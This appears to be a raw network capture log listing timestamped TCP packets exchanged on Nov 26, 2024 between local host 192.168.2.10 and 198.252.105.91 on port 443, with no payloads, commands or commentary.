                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.823457956 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.823481083 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.823580027 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.823590040 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.823642015 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.832357883 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.832375050 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.832494974 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.832515001 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.832561970 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.839391947 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.839423895 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.839498997 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.839533091 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.839587927 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.847440004 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.847462893 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.847568989 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.847589970 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.847635984 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.855669975 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.855693102 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.855782032 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.855813026 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.855855942 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.001374960 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.001399994 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.001473904 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.001504898 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.001547098 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009584904 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009603024 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009649038 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009677887 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009697914 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009738922 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.017740011 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.017757893 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.017822981 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.017851114 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.017889977 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.024866104 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.024883986 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.024947882 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.024976015 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.025017977 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033659935 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033678055 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033732891 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033757925 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033780098 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033811092 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.041815996 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.041832924 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.041930914 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.041949034 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.041986942 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.049060106 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.049078941 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.049226999 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.049252033 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.049299955 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.057143927 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.057159901 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.057320118 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.057339907 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.057405949 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.202656031 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.202683926 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.202801943 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.202830076 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.202891111 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.211308002 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.211334944 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.211451054 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.211469889 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.211527109 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.218964100 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.218983889 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.219079971 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.219105959 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.219151974 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.226160049 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.226198912 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.226279974 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.226285934 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.226309061 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.226330996 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.234903097 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.234932899 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.234987020 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.235014915 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.235035896 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.235097885 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.242089033 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.242121935 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.242233992 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.242242098 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.242290974 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.250205994 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.250224113 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.250389099 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.250396013 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.250469923 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.258455038 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.258472919 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.258579016 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.258588076 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.258670092 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.403925896 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.403954983 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.404083014 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.404110909 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.404165030 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.414500952 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.414527893 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.414674997 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.414685011 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.414730072 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.421588898 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.421608925 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.421746016 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.421753883 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.421813011 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.428591967 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.428622007 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.428742886 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.428750992 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.428795099 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.436261892 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.436290026 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.436397076 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.436408997 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.436460018 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.443793058 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.443811893 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.443900108 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.443929911 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.443943977 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.443977118 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.444169044 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.451633930 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.451653004 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.451744080 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.451764107 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.451812983 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.459705114 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.459722996 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.459808111 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.459820032 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.459863901 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.606081009 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.606106043 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.606177092 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.606215954 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.606230021 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.606261969 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.614223957 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.614244938 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.614315033 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.614322901 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.614366055 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.621864080 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.621882915 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.621937990 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.621951103 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.621990919 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.622013092 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.629654884 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.629679918 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.629733086 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.629757881 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.629805088 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.637275934 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.637296915 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.637373924 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.637403011 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.637445927 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.645447016 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.645464897 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.645560026 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.645586967 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.645632029 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.654753923 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.654772043 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.654854059 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.654881954 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.654925108 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.660851955 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.660871029 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.660932064 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.660959005 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.660999060 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.806972980 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.806996107 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.807084084 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.807116985 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.807145119 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.807174921 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.815169096 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.815188885 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.815272093 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.815299988 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.815341949 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.823298931 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.823323011 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.823411942 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.823421955 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.823467016 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.833556890 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.833575964 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.833679914 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.833689928 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.833735943 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.839720964 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.839735985 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.839828014 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.839838028 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.839884996 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.846411943 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.846427917 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.846514940 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.846525908 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.846577883 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.854620934 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.854645014 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.854736090 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.854753017 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.854799032 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.862840891 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.862858057 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.862947941 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.862958908 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.863002062 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.009392023 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.009424925 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.009571075 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.009603977 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.009618044 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.009656906 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.016443014 CET44349708198.252.105.91192.168.2.10
